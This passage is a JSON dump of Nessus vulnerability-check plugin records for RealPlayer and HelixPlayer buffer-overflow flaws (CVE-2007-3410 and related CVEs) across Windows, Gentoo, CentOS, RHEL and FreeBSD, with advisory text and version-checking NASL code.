\"HelixPlayer\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-07-30T13:55:00", "references": ["http://www.securityfocus.com/archive/1/472295/30/0/threaded", "http://www.nessus.org/u?73f95fcd"], "pluginID": "25573", "description": "According to its build number, the installed version of RealPlayer on the remote Windows host contains a stack-based buffer overflow that can be triggered by a specially crafted SMIL file, perhaps accessed over the web using the CLSID 'CFCDAA03-8BE4-11cf-B84B-0020AFBBCCFA'.\nA remote attacker may be able to exploit this issue to execute arbitrary code subject to the user's privileges on the affected host.", "edition": 3, "reporter": "Tenable", "published": "2007-06-27T00:00:00", "title": "RealPlayer for Windows < Build 6.0.12.1578 Multiple Vulnerabilities", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Windows", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-3410"], "modified": "2018-07-25T00:00:00", "cpe": ["cpe:/a:realnetworks:realplayer"], "id": "REALPLAYER_6_0_12_1578.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=25573", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25573);\n script_version(\"1.22\");\n\n script_cve_id(\"CVE-2007-3410\");\n script_bugtraq_id(24658);\n\n script_name(english:\"RealPlayer for Windows < Build 6.0.12.1578 Multiple Vulnerabilities\");\n script_summary(english:\"Checks RealPlayer build number\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows application is affected by a buffer overflow\nvulnerability.\" );\n script_set_attribute(attribute:\"description\", value:\n\"According to its build number, the installed version of RealPlayer on\nthe remote Windows host contains a stack-based buffer overflow that\ncan be triggered by a specially crafted SMIL file, perhaps accessed\nover the web using the CLSID 'CFCDAA03-8BE4-11cf-B84B-0020AFBBCCFA'.\nA remote attacker may be able to exploit this issue to execute\narbitrary code subject to the user's privileges on the affected host.\" );\n # http://www.verisigninc.com/en_US/cyber-security/security-intelligence/vulnerability-reports/articles/index.xhtml?id=547\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?73f95fcd\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/472295/30/0/threaded\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrading to the latest version of the product supposedly resolves the\nissue, although the vendor has not confirmed that.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/06/27\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/06/26\");\n script_cvs_date(\"Date: 2018/07/25 18:58:06\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\nscript_set_attribute(attribute:\"cpe\", value:\"cpe:/a:realnetworks:realplayer\");\nscript_end_attributes();\n\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"realplayer_detect.nasl\");\n script_require_keys(\"SMB/RealPlayer/Product\", \"SMB/RealPlayer/Build\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\n\n\n# nb: there's no information regarding whether RealOne Player \n# or RealPlayer Enterprise are also affected.\nprod = get_kb_item(\"SMB/RealPlayer/Product\");\nif (!prod || prod != \"RealPlayer\") exit(0);\n\n\n# There's a problem if the build is before 6.0.12.1578.\nbuild = get_kb_item(\"SMB/RealPlayer/Build\");\nif (!build) exit(0);\n\nver = split(build, sep:'.', keep:FALSE);\nif (\n int(ver[0]) < 6 ||\n (\n int(ver[0]) == 6 &&\n int(ver[1]) == 0 && \n (\n int(ver[2]) < 12 ||\n (int(ver[2]) == 12 && int(ver[3]) < 1578)\n )\n )\n)\n{\n if (report_verbosity)\n {\n report = string(\n \"\\n\",\n prod, \" build \", build, \" is installed on the remote host.\\n\"\n );\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:report);\n }\n else security_hole(get_kb_item(\"SMB/transport\"));\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-11T09:02:48", "references": ["https://security.gentoo.org/glsa/200709-05"], "pluginID": "26095", "description": "The remote host is affected by the vulnerability described in GLSA-200709-05 (RealPlayer: Buffer overflow)\n\n A stack-based buffer overflow vulnerability has been reported in the SmilTimeValue::parseWallClockValue() function in smlprstime.cpp when handling HH:mm:ss.f type time formats.\n Impact :\n\n By enticing a user to open a specially crafted SMIL (Synchronized Multimedia Integration Language) file, an attacker could be able to execute arbitrary code with the privileges of the user running the application.\n Workaround :\n\n There is no known workaround at this time.", "edition": 3, "reporter": "Tenable", "published": "2007-09-24T00:00:00", "title": "GLSA-200709-05 : RealPlayer: Buffer overflow", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Gentoo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-3410"], "modified": "2018-08-10T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:realplayer", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-200709-05.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=26095", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200709-05.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(26095);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2018/08/10 18:07:06\");\n\n script_cve_id(\"CVE-2007-3410\");\n script_xref(name:\"GLSA\", value:\"200709-05\");\n\n script_name(english:\"GLSA-200709-05 : RealPlayer: Buffer overflow\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200709-05\n(RealPlayer: Buffer overflow)\n\n A stack-based buffer overflow vulnerability has been reported in the\n SmilTimeValue::parseWallClockValue() function in smlprstime.cpp when\n handling HH:mm:ss.f type time formats.\n \nImpact :\n\n By enticing a user to open a specially crafted SMIL (Synchronized\n Multimedia Integration Language) file, an attacker could be able to\n execute arbitrary code with the privileges of the user running the\n application.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200709-05\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All RealPlayer users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-video/realplayer-10.0.9'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:realplayer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/09/24\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/06/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"media-video/realplayer\", unaffected:make_list(\"ge 10.0.9\"), vulnerable:make_list(\"lt 10.0.9\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"RealPlayer\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-10T17:33:12", "references": ["http://www.nessus.org/u?3e6b8b19", "http://www.nessus.org/u?ce655a86"], "pluginID": "25614", "description": "An updated HelixPlayer package that fixes a buffer overflow flaw is now available.\n\nThis update has been rated as having critical security impact by the Red Hat Security Response Team.\n\nHelixPlayer is a media player.\n\nA buffer overflow flaw was found in the way HelixPlayer processed Synchronized Multimedia Integration Language (SMIL) files. It was possible for a malformed SMIL file to execute arbitrary code with the permissions of the user running HelixPlayer. (CVE-2007-3410)\n\nAll users of HelixPlayer are advised to upgrade to this updated package, which contains a backported patch and is not vulnerable to this issue.", "edition": 3, "reporter": "Tenable", "published": "2007-06-29T00:00:00", "title": "CentOS 4 : HelixPlayer (CESA-2007:0605)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-3410"], "modified": "2018-08-09T00:00:00", "cpe": ["cpe:/o:centos:centos:4", "p-cpe:/a:centos:centos:HelixPlayer"], "id": "CENTOS_RHSA-2007-0605.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=25614", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0605 and \n# CentOS Errata and Security Advisory 2007:0605 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25614);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/08/09 17:06:35\");\n\n script_cve_id(\"CVE-2007-3410\");\n script_xref(name:\"RHSA\", value:\"2007:0605\");\n\n script_name(english:\"CentOS 4 : HelixPlayer (CESA-2007:0605)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated HelixPlayer package that fixes a buffer overflow flaw is\nnow available.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nHelixPlayer is a media player.\n\nA buffer overflow flaw was found in the way HelixPlayer processed\nSynchronized Multimedia Integration Language (SMIL) files. It was\npossible for a malformed SMIL file to execute arbitrary code with the\npermissions of the user running HelixPlayer. (CVE-2007-3410)\n\nAll users of HelixPlayer are advised to upgrade to this updated\npackage, which contains a backported patch and is not vulnerable to\nthis issue.\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2007-June/013994.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3e6b8b19\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2007-June/013995.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ce655a86\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected helixplayer package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:HelixPlayer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/06/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/06/29\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/06/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"HelixPlayer-1.0.6-0.EL4.2.0.2\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"HelixPlayer-1.0.6-0.EL4.2.0.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-15T15:13:33", "references": ["http://rhn.redhat.com/errata/RHSA-2007-0605.html", "https://www.redhat.com/security/data/cve/CVE-2007-3410.html"], "pluginID": "25624", "description": "An updated HelixPlayer package that fixes a buffer overflow flaw is now available.\n\nThis update has been rated as having critical security impact by the Red Hat Security Response Team.\n\nHelixPlayer is a media player.\n\nA buffer overflow flaw was found in the way HelixPlayer processed Synchronized Multimedia Integration Language (SMIL) files. It was possible for a malformed SMIL file to execute arbitrary code with the permissions of the user running HelixPlayer. (CVE-2007-3410)\n\nAll users of HelixPlayer are advised to upgrade to this updated package, which contains a backported patch and is not vulnerable to this issue.", "edition": 4, "reporter": "Tenable", "published": "2007-06-29T00:00:00", "title": "RHEL 4 : HelixPlayer (RHSA-2007:0605)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-3410"], "modified": "2018-08-13T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:HelixPlayer", "cpe:/o:redhat:enterprise_linux:4", "cpe:/o:redhat:enterprise_linux:4.5"], "id": "REDHAT-RHSA-2007-0605.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=25624", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0605. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25624);\n script_version (\"1.30\");\n script_cvs_date(\"Date: 2018/08/13 14:32:37\");\n\n script_cve_id(\"CVE-2007-3410\");\n script_xref(name:\"RHSA\", value:\"2007:0605\");\n\n script_name(english:\"RHEL 4 : HelixPlayer (RHSA-2007:0605)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated HelixPlayer package that fixes a buffer overflow flaw is\nnow available.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nHelixPlayer is a media player.\n\nA buffer overflow flaw was found in the way HelixPlayer processed\nSynchronized Multimedia Integration Language (SMIL) files. It was\npossible for a malformed SMIL file to execute arbitrary code with the\npermissions of the user running HelixPlayer. (CVE-2007-3410)\n\nAll users of HelixPlayer are advised to upgrade to this updated\npackage, which contains a backported patch and is not vulnerable to\nthis issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-3410.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2007-0605.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected HelixPlayer package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:HelixPlayer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/06/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/06/29\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/06/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2007:0605\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"HelixPlayer-1.0.6-0.EL4.2.0.2\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"HelixPlayer\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-29T13:36:13", "references": ["http://www.zerodayinitiative.com/advisories/ZDI-07-062.html", "http://www.zerodayinitiative.com/advisories/ZDI-07-061.html", "http://www.zerodayinitiative.com/advisories/ZDI-07-063.html", "http://service.real.com/realplayer/security/10252007_player/en/", "http://www.nessus.org/u?21866adf"], "pluginID": "29866", "edition": 2, "description": "Secunia reports :\n\nMultiple vulnerabilities have been reported in RealPlayer/RealOne/HelixPlayer, which can be exploited by malicious people to compromise a user's system.\n\nAn input validation error when processing .RA/.RAM files can be exploited to cause a heap corruption via a specially crafted .RA/.RAM file with an overly large size field in the header.\n\nAn error in the processing of .PLS files can be exploited to cause a memory corruption and execute arbitrary code via a specially crafted .PLS file.\n\nAn input validation error when parsing .SWF files can be exploited to cause a buffer overflow via a specially crafted .SWF file with malformed record headers.\n\nA boundary error when processing rm files can be exploited to cause a buffer overflow.", "reporter": "Tenable", "published": "2008-01-07T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "type": "nessus", "title": "FreeBSD : linux-realplayer -- multiple vulnerabilities (f762ccbb-baed-11dc-a302-000102cc8983)", "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-2264", "CVE-2007-2263", "CVE-2007-5081", "CVE-2007-3410"], "cpe": ["p-cpe:/a:freebsd:freebsd:linux-realplayer", "cpe:/o:freebsd:freebsd"], "modified": "2015-01-15T00:00:00", "id": "FREEBSD_PKG_F762CCBBBAED11DCA302000102CC8983.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=29866", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2013 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(29866);\n script_version(\"$Revision: 1.18 $\");\n script_cvs_date(\"$Date: 2015/01/15 16:37:16 $\");\n\n script_cve_id(\"CVE-2007-2263\", \"CVE-2007-2264\", \"CVE-2007-3410\", \"CVE-2007-5081\");\n script_xref(name:\"CERT\", value:\"759385\");\n script_xref(name:\"Secunia\", value:\"25819\");\n script_xref(name:\"Secunia\", value:\"27361\");\n\n script_name(english:\"FreeBSD : linux-realplayer -- multiple vulnerabilities (f762ccbb-baed-11dc-a302-000102cc8983)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Secunia reports :\n\nMultiple vulnerabilities have been reported in\nRealPlayer/RealOne/HelixPlayer, which can be exploited by malicious\npeople to compromise a user's system.\n\nAn input validation error when processing .RA/.RAM files can be\nexploited to cause a heap corruption via a specially crafted .RA/.RAM\nfile with an overly large size field in the header.\n\nAn error in the processing of .PLS files can be exploited to cause a\nmemory corruption and execute arbitrary code via a specially crafted\n.PLS file.\n\nAn input validation error when parsing .SWF files can be exploited to\ncause a buffer overflow via a specially crafted .SWF file with\nmalformed record headers.\n\nA boundary error when processing rm files can be exploited to cause a\nbuffer overflow.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://service.real.com/realplayer/security/10252007_player/en/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.zerodayinitiative.com/advisories/ZDI-07-063.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.zerodayinitiative.com/advisories/ZDI-07-062.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.zerodayinitiative.com/advisories/ZDI-07-061.html\"\n );\n # http://www.freebsd.org/ports/portaudit/f762ccbb-baed-11dc-a302-000102cc8983.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?21866adf\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-realplayer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/10/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/01/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/01/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2015 Tenable Network Security, Inc.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"linux-realplayer>=10.0.5<10.0.9.809.20070726\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, 